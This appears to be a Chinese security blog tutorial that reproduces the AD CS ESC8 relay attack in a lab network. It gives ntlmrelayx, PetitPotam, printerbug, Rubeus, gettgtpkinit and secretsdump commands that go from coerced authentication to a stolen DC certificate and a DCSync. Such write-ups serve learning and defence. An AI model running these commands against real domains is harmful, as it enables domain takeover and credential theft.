域安全|AD CS Relay—ESC8

最新推荐文章于 2025-02-26 10:07:27 发布
最新推荐文章于 2025-02-26 10:07:27 发布
阅读量7.6k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 域渗透 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42282189/article/details/123701963

作者: 0xYyy
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x01 前言

国外安全研究人员在6月份已经披露过攻击手法—通过证书进行中继从而来达到攻击域控的目的。

https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/
在这里插入图片描述

0x02 AD CS作用

1、证书颁发机构(CA):可以向用户、机构和服务颁发证书。

2、CA WEB注册:用户可以通过web浏览器申请证书。

3、联机响应程序服务:联机响应程序服务通过对特定证书的吊销状态申请进行解码,评估这些证书的状态,并发送回包含所申请证书状态信息的签名响应来实现联机证书状态协议 (OCSP)。

4、网络设备注册服务:网络设备注册服务可根据 Cisco Systems Inc. 提供的简单证书注册协议 (SCEP) 允许路由器和其他网络设备获取证书。

0x03 AD CS 配置

配置文章参考:https://blog.youkuaiyun.com/xiezuoyong/article/details/22663039

0x04 AD CS 中继攻击

在域内配置好ADCS后 默认会存在一个http站点http://192.168.10.20/certsrv/certfnsh.asp

在这里插入图片描述
攻击者将用户/机器身份验证中继到 AD CS 服务器并获取用户/机器证书。

一旦攻击者获得证书,攻击者就可以请求用户/机器 TGT 并成为网络上的该用户/机器。

1、本地测试环境


攻击机:192.168.10.1
AD主域控:192.168.10.10
AD辅域控:192.168.10.20

2、使用 Ex 提供的impacket 进行relay
项目地址:https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack

3、使用 Petitpotam 进行 强制认证
项目地址:https://github.com/topotam/PetitPotam/blob/main/Petitpotam.py

0x05 复现过程

1、查看CA机器


certutil -config - -ping

2、ntlmrelayx.py将证书颁发机构 (CA) 设置为中继目标

ntlmrelayx.py -t http://192.168.10.20/certsrv/certfnsh.asp -smb2support --adcs --template 'Domain Controller

在这里插入图片描述
3、强制机器回联打印机协议触发


#1、Petitpotam.py
python Petitpotam.py -u '' -d '' -p '' 192.168.10.1 192.168.10.10

//python Petitpotam.py -u '' -d '' -p '' "ntlmrelay address" "DC01 address"

#2、printerbug.py
python printerbug.py abc/Yyy:123.com@192.168.10.10 192.168.10.1

在这里插入图片描述
4、获得CA证书
在这里插入图片描述
生成的证书会在较长的时间内有效默认一年有效期
5、klist 查看当前用户票据
在这里插入图片描述
6、注入票据


#Rubeus.exe
Rubeus.exe asktgt /user:HC$ /certificate:certificatebase64body /ptt


#gettgtpkinit.py
python3 gettgtpkinit.py abc.com/DC2012$ -pfx-base64 MIIRZQIBAzCCES8GCSqGSIb3DQEHAa.......  kirbi.ccache

#导入票据
export KRB5CCNAME=kirbi.ccache

7、DCsync


secretsdump.py -k win-2016-dc.god.com -just-dc

0x06 参考文章

https://zhuanlan.zhihu.com/p/388384018

https://mp.weixin.qq.com/s/uwqjIpOCgmQVY7fC8NLJyA

0x06 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!

在这里插入图片描述

ADCS relay
问题很多的小明
07-10 704
ADCS relay
10、 AD证书服务和权限管理服务:提升信息安全与管理
最新发布
weixin_32921023的博客
05-29 30
本文详细介绍了Active Directory Certificate Services (AD CS) 和 Active Directory Rights Management Services (AD RMS) 的工作原理、部署步骤及实际应用案例,帮助企业和管理员提升数据传输安全和文档权限管理能力。同时探讨了未来技术发展方向,提供了优化建议和常用工具资源。
ADCS攻击之NTLM Relay攻击 ESC8
Adminxe的博客
03-05 919
ADCS在默认安装的时候,其Web接口支持NTLM身份验证并且没有启用任何NTLM Relay保护措施。强制控制器计算机帐户(DC$)向配置了NTLM中继的主机进行身份验证。身份验证被转发给证书颁发机构(CA)并提出对证书的请求。获取到了DC$的证书后就可以为用户/机器请求TGS/TGT票据,获取相应的权限。curl-I。
ADCS-ESC8漏洞利用
信息安全
02-26 793
控:192.168.110.127证书服务器:192.168.110.153内主机:192.168.110.222外kali:192.168.110.155。
深入分析内ntlm relay to adcs服务的利用(含wireshark抓包分析)
m0_71746299的博客
01-27 435
前言 2021年中旬,specterops发布了一项针对证书服务(adcs)的利用白皮书,文档中提到了19种对adcs服务的利用。本篇主要是分析文中提出的ntlm relay to adcs窃取证书的攻击流程,原理和抓包分析。 相关内容 ADCS介绍 Active Directory证书服务(Active Directory Certificate Services,下文简称ADCS)可以向用户,机构和服务颁发证书,收到证书的个体可以使用证书进行内的身份认证,本篇中要利用的是ADCS配置的WEB证书请求
AD CS安装
问题很多的小明
07-10 595
本文带来了如何安装ADCS证书服务的安装记录
Python库 | graphql-relay-0.4.2.tar.gz
03-05
**Python库:graphql-relay-0.4.2** GraphQL是一种强大的API查询语言,由Facebook开发,用于构建灵活、高效且可扩展的后端服务。GraphQL Relay是与GraphQL紧密关联的一个库,它提供了一套标准的工具和协议,用于在...
Python库 | trustlines-relay-0.9.0.tar.gz
03-11
《Python库:trustlines-relay-0.9.0详解》 在信息技术领,Python以其简洁易读的语法和强大的库支持,成为了开发者们广泛使用的编程语言。本篇将聚焦于一个特定的Python库——trustlines-relay-0.9.0,通过对该库...
Python库 | ariadne_relay-0.1.0a2-py3-none-any.whl
03-14
标题中的“Python库 | ariadne_relay-0.1.0a2-py3-none-any.whl”指的是一个Python库的发行版本,名为ariadne_relay,版本号为0.1.0a2。这个库是为Python 3编写的,因为它带有“py3-none-any”的标识。在Python生态...
Python库 | Robogaia4Relay-0.1.tar.gz
05-21
资源分类:Python库 所属语言:Python 资源全名:Robogaia4Relay-0.1.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | trustlines-relay-0.11.0.tar.gz
03-11
python库。 资源全名:trustlines-relay-0.11.0.tar.gz
PetitPotam漏洞复现(ESC8)结合CVE-2019-1040
whojoe的博客
08-02 3890
PetitPotam漏洞复现环境搭建漏洞复现参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 控1 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 控2 ad2.test.com 192.168.164.146 administrator Aa1234 win2012r2 内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 kali
【Windows Server 2019】Active Directory Certificate Services 证书颁发机构的安装,配置和管理Ⅰ——AD CS的安装和配置
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
07-25 4143
博文主要介绍了Windows Server 2019的证书颁发机构的安装和配置方法。
Windows Server Active Directory 证书服务(AD CS)安装与部署指南
热门推荐
有技术的机械师
07-08 2万+
本篇文章重点介绍一下Windows Server Active Directory 证书服务安装与部署。 从以下几个方面入手介绍:
Winodws2016 安装AD CS与架设根CA
游离态De猫
10-01 2231
Winodws2016 安装AD CS与架设根CA 设备 IP地址 作用 Windows2016 192.168.10.1 CA独立证书机构 Windows10 192.168.10.10 CA客户机 ...
渗透笔记-证书服务器(ADCS)安装
NoooEmotion的博客
02-02 2820
AD CS证书服务(SSL证书):可以部署企业根或独立根建立SSL加密通道,这是所有服务器证书,无论品牌、申请方式都可以起到的功能,唯一的价值区别在于加密强度,目前,达到128位对称加密强度的服务器证书均可以实现有保障的加密通道。
AD CS证书服务
weixin_47347190的博客
07-10 2411
AD CS证书服务(SSL证书):可以部署企业根或独立根 建立SSL加密通道,这是所有服务器证书,无论品牌、申请方式都可以起到的功能,唯一的价值区别在于加密强度,目前,达到128位对称加密强度的服务器证书均可以实现有保障的加密通道。 本实验是主要企业根 实验环境:windows server 2012 r2 在额外控制器 安装AD CS服务,在添加和角色功能,勾选AD 证书服务,如下图 直到下图这一步,勾选证书颁发机构web注册 接着下一步,就好了。直到安装完成 点击感叹号...
AD CS攻击面剖析
2201_75571291的博客
08-24 516
LEE CHRISTENSEN和WILL SCHROEDER于今年9月30日在Black Hat会议上进行了主题为“CERTIFIED PRE-OWNED:SERVICES”的演讲,首次在公开国际会议中讨论了有关活动目录证书服务(Active Directory Certificate Services,ADCS)的攻击面。AD CS是微软免费的证书管理服务,用于微软的 PKI 实施。企业可以使用ADCS通过将个人、设备或服务的身份绑定到相应的私钥来增强安全性。
ADCS在内网渗透中的应用
hackzkaq的博客
11-07 452
在打攻防演练的时候有时候运气比较好的话会碰到部署了证书服务(AD CS)的内网环境,由于证书服务发布的部分证书可用于Kerberos认证并且在返回的PAC里面能拿到NTLM Hash,由此我们可以进行以下类型的内网攻击尝试身份认证:当我们拿到目标主机的权限后,我们可以在本地检索是否存在相关的证书并用该证书进行内身份认证权限维持:当我们拿到用户的凭据后,我们可以申请一个证书,由于证书可用于Kerberos认证,所以即便后期用户更改密码,只有证书在手就可以随时拿到NTLM Hash。
250V|12VCOIL|12A|RELAY SUGARCUBE 15A|12VCOIL HF3FF/012-ZST 是什么
05-17
250V|12VCOIL|12A|RELAY SUGARCUBE 15A|12VCOIL HF3FF/012-ZST 是一种继电器,通常用于电子设备或电路中。它具有250V的负载电压、12V的激活电压、12A的额定电流,是一种较为常见的规格。HF3FF/012-ZST 是该继电器的型号,由于其体积较小,因此常被称为"Sugarcube"。这种继电器可用于控制各种类型的电器,例如灯光、风扇、电机等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

灼剑(Tsojan)安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值